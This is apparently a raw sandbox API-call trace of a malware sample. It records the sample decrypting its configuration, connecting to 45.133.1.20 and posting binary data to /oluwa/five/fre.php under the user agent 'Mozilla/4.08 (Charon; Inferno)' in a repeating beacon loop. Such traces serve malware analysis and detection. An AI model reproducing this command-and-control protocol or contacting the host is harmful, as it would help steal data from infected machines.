LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.121] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.122] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.122] GetProcessHeap () returned 0x6a0000 [0191.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c0088 | out: hHeap=0x6a0000) returned 1 [0191.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.124] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0191.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.125] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0191.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.131] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0191.131] GetProcessHeap () returned 0x6a0000 [0191.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.132] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.133] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.135] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.136] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.136] GetProcessHeap () returned 0x6a0000 [0191.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0191.136] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.136] GetProcessHeap () returned 0x6a0000 [0191.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0191.137] GetProcessHeap () returned 0x6a0000 [0191.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.138] GetProcessHeap () returned 0x6a0000 [0191.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0191.139] GetProcessHeap () returned 0x6a0000 [0191.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0191.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.140] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.150] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0191.158] GetProcessHeap () returned 0x6a0000 [0191.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0191.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.160] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0191.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.161] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.162] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.162] GetProcessHeap () returned 0x6a0000 [0191.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0191.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.164] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0191.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.165] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0191.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.166] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0191.167] GetProcessHeap () returned 0x6a0000 [0191.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.168] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0191.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.169] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0191.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.171] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0191.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.172] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0191.172] GetProcessHeap () returned 0x6a0000 [0191.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0191.172] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0191.172] GetProcessHeap () returned 0x6a0000 [0191.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0191.172] socket (af=2, type=1, protocol=6) returned 0x494 [0191.173] connect (s=0x494, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0191.199] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0191.199] GetProcessHeap () returned 0x6a0000 [0191.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0191.199] GetProcessHeap () returned 0x6a0000 [0191.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0191.200] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0191.201] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.201] GetProcessHeap () returned 0x6a0000 [0191.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0191.201] GetProcessHeap () returned 0x6a0000 [0191.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0191.202] GetProcessHeap () returned 0x6a0000 [0191.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0191.202] GetProcessHeap () returned 0x6a0000 [0191.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0191.203] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0191.204] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.204] GetProcessHeap () returned 0x6a0000 [0191.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0191.204] GetProcessHeap () returned 0x6a0000 [0191.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0191.205] send (s=0x494, buf=0x6b5c98*, len=242, flags=0) returned 242 [0191.206] send (s=0x494, buf=0x6bb998*, len=159, flags=0) returned 159 [0191.206] GetProcessHeap () returned 0x6a0000 [0191.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0191.206] recv (in: s=0x494, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0191.277] GetProcessHeap () returned 0x6a0000 [0191.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0191.278] GetProcessHeap () returned 0x6a0000 [0191.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0191.279] GetProcessHeap () returned 0x6a0000 [0191.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0191.279] GetProcessHeap () returned 0x6a0000 [0191.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0191.280] closesocket (s=0x494) returned 0 [0191.281] GetProcessHeap () returned 0x6a0000 [0191.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0191.281] GetProcessHeap () returned 0x6a0000 [0191.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.281] GetProcessHeap () returned 0x6a0000 [0191.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0191.282] GetProcessHeap () returned 0x6a0000 [0191.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0191.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1238) returned 0x494 [0191.284] Sleep (dwMilliseconds=0xea60) [0191.286] GetProcessHeap () returned 0x6a0000 [0191.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0191.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.288] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.300] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0191.312] GetProcessHeap () returned 0x6a0000 [0191.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0191.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.313] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0191.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.314] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.318] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.318] GetProcessHeap () returned 0x6a0000 [0191.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0191.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.321] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0191.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.322] CryptDestroyKey (hKey=0x6ad020) returned 1 [0191.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.327] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0191.327] GetProcessHeap () returned 0x6a0000 [0191.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.329] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.330] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.331] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.333] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.333] GetProcessHeap () returned 0x6a0000 [0191.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0191.333] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.333] GetProcessHeap () returned 0x6a0000 [0191.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0191.334] GetProcessHeap () returned 0x6a0000 [0191.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.334] GetProcessHeap () returned 0x6a0000 [0191.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0191.334] GetProcessHeap () returned 0x6a0000 [0191.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0191.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0191.358] GetProcessHeap () returned 0x6a0000 [0191.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0191.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.359] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0191.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.361] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.363] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.363] GetProcessHeap () returned 0x6a0000 [0191.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0191.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.365] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0191.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.366] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0191.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.367] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0191.367] GetProcessHeap () returned 0x6a0000 [0191.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.368] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0191.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.373] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0191.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.374] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0191.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.375] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0191.375] GetProcessHeap () returned 0x6a0000 [0191.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0191.375] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0191.375] GetProcessHeap () returned 0x6a0000 [0191.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0191.375] socket (af=2, type=1, protocol=6) returned 0x498 [0191.376] connect (s=0x498, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0191.399] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0191.399] GetProcessHeap () returned 0x6a0000 [0191.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0191.399] GetProcessHeap () returned 0x6a0000 [0191.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0191.400] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0191.401] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.401] GetProcessHeap () returned 0x6a0000 [0191.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0191.401] GetProcessHeap () returned 0x6a0000 [0191.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0191.402] GetProcessHeap () returned 0x6a0000 [0191.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0191.402] GetProcessHeap () returned 0x6a0000 [0191.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0191.403] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0191.404] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.404] GetProcessHeap () returned 0x6a0000 [0191.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0191.404] GetProcessHeap () returned 0x6a0000 [0191.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0191.405] send (s=0x498, buf=0x6b5c98*, len=242, flags=0) returned 242 [0191.405] send (s=0x498, buf=0x6bb998*, len=159, flags=0) returned 159 [0191.405] GetProcessHeap () returned 0x6a0000 [0191.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0191.406] recv (in: s=0x498, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0191.484] GetProcessHeap () returned 0x6a0000 [0191.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0191.485] GetProcessHeap () returned 0x6a0000 [0191.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0191.485] GetProcessHeap () returned 0x6a0000 [0191.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0191.486] GetProcessHeap () returned 0x6a0000 [0191.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0191.486] closesocket (s=0x498) returned 0 [0191.487] GetProcessHeap () returned 0x6a0000 [0191.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0191.487] GetProcessHeap () returned 0x6a0000 [0191.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.488] GetProcessHeap () returned 0x6a0000 [0191.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0191.488] GetProcessHeap () returned 0x6a0000 [0191.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0191.489] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x123c) returned 0x498 [0191.491] Sleep (dwMilliseconds=0xea60) [0191.493] GetProcessHeap () returned 0x6a0000 [0191.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0191.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.495] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.503] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0191.511] GetProcessHeap () returned 0x6a0000 [0191.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0191.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.512] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0191.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.516] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.517] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.517] GetProcessHeap () returned 0x6a0000 [0191.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0191.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.519] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0191.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.520] CryptDestroyKey (hKey=0x6ad4e0) returned 1 